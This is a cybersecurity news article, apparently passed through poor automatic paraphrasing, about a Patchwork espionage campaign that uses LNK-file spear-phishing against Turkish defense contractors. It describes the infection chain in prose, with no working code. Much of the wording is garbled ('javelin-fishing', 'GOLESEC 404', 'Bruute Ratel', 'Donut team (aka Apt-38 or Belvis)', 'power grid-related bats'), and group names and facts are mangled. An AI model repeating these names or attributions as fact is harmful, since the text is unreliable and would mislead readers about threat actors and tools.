Known as a actor with danger Scatter The target of collecting strategic intelligence has been held responsible for a new javelin-fishing campaign targeting Turkish defense contractors.
Arctic Wolf Labs said in a technical report published this week, “The campaign has employed a five-step execution chain, disguised through malicious LNK files, disrupted as the conference invitation, which has been sent to learn more about unmanned vehicle systems.”
Activity, which also sang an anonymous manufacturer of accurate-directed missile systems, seems to be tightly motivated as time between Pakistan and Turkay and recent India-Pakistan military clashes.
Patchwork, also known as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger and Zinc Emeron, is evaluated as a state-provided actor of Indian origin. At least known for being active since 2009, the Hacking Group has a track record of striking institutions in China, Pakistan and other countries of South Asia.
Exactly one year ago, GOLESEC 404 team documented the target institutions of patchwork with Bhutan’s relationship to distribute the updated version of a previous door called Bruute Ratel C4 Framework and PGOSHELL.
Since the onset of 2025, the danger actor has been linked to various campaigns aimed at the purpose of Chinese universities, with recent attacks to give a rust-based loader using the power grid-related bats in the country, which in turn, decrypts and launches a C# Trojan called Protego, which is a wide series of a wide series from Windows Systems.
Another report published by the Chinese Cyber Security firm Qianxin in May said that it identified the infrastructure overlaps between the patchwork and the Donut team (aka Apt -38 or Belvis), suggesting a possible operational connection between two danger groups.
The target of türkiye by the hacking group indicates the expansion of its targeting footprint, using malicious Windows shortcut (LNK) files, is distributed via a fishing email using the files, which is as a starting point to kick-off the multi-stage transition process.
In particular, the LNK file is designed to invite the Powershelle Command that are responsible for bringing additional payload from the outer server (“Exampuve[.]Org “), a domain built on 25 June 2025, hosts a PDF greed to copy an international conference on unmanned vehicle systems, whose details are hosted on a valid waters[.]org website.
Arctic Wolf said, “The PDF document acts as a visual decoy, designed to distract the user, while the rest of the execution chain runs quietly in the background.” “This targeting occurs as türkiye, a 65% command of the global UAV export market and develops significant hypersonic missile capabilities, while simultaneously strengthens defense relations with Pakistan during the India-Pakistan tension period.”
Downloaded artifacts have a malicious DLL launched using DLL side-loading through a scheduled work, eventually leading to the execution of shellcode that completes the comprehensive reconnaissance of the compromised hosts, including taking screenshots, and providing the server back.
The company said, “This represents a significant development of the capabilities of this danger actor, infection from the X64 DLL variants seen in November 2024, with the current X86 PE execution enhanced command structures,” the company said. “Dropping elephants demonstrate constant operational investment and development through architectural diversification for X86 Pe formats from X64 DLL, and increase the C2 protocol implementation through copying of legitimate websites.”
